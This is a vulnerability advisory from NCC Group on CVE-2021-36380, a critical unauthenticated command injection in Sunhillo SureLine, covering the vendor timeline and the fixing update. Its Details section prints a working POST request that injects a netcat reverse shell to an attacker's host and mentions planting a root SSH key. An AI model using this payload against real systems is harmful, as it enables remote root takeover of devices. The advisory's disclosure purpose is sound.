Vendor: Sunhillo 
Vendor URL: https://www.sunhillo.com/ 
Versions affected: SureLine <= 8.7.0 
Systems Affected: Any using SureLine 
Author: Liam Glanfield <[email protected]> 
Advisory URL / CVE Identifier: CVE-2021-36380 
Risk: Critical - complete compromise of the host

Summary

Sunhillo is an industry leader in surveillance data distribution. The Sunhillo SureLine application contained an unauthenticated operating system (OS) command injection vulnerability that allowed an attacker to execute arbitrary commands with root privileges. This would have allowed for a threat actor to establish an interactive channel, effectively taking control of the target system.

Impact

Complete system compromise. With the threat actor in full control of the device they could cause a denial of service or utilise the device for persistence on the network.

Details

The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.

The script did appear to validate user input and blocked most techniques for OS command injection. Additionally, the request also did not require any authentication (session cookie etc.). However, command injection was still possible using $(), thus enabling arbitrary commands to be run within the parenthesis.

The following parameters were affected:

  • ipAddr
  • dnsAddr

The following lines demonstrate the creation of a reverse connection to an attacker’s host, leading to the establishment of a covert channel, effectively allowing an attacker to execute commands on the server. The installed ‘nc’ package (Netcat) is used to create a reverse connection to an attacker’s host (192.168.1.2) on port TCP/8181 while redirecting all traffic (stdout and stderr) to and from the /bin/bash shell.

POST /cgi/networkDiag.cgi HTTP/1.1 
Host: 192.168.1.1 
Content-Length: 145 

command=2&ipAddr=&dnsAddr=$(nc+e+/bin/bash+192.168.1.2+8181)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=

The code above would send the shell to an attacker’s host, which in this case should have port 8181 on listening mode. This was compounded further by the web service running as root and with an interactive shell now established, the system would be in full control of the attacker. For example the attacker could add a SSH public key into /home/root/.ssh/authorized_keys and gain access as the root user.

Recommendation

Update Sunhillo SureLine to version 8.7.0.1.1.

Vendor Communication

NCC Group Notifies Vendor: 21st June 2021 
Vendor Replies Requesting More Details: 21st June 2021 
NCC Group Sends Requested information: 21st June 2021 
Vendor Confirms The Vulnerability: 28th June 2021 
NCC Group Requests a Patch Date: 28th June 2021 
Vendor Response With Date: 7th July 2021 
Patch Published: 22nd July 2021 
Advisory Published: 26th July 2021

Thanks to

Liam Glanfield at NCC Group

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Publish Date: 7/26/2021

Written by: Liam Glanfield

Published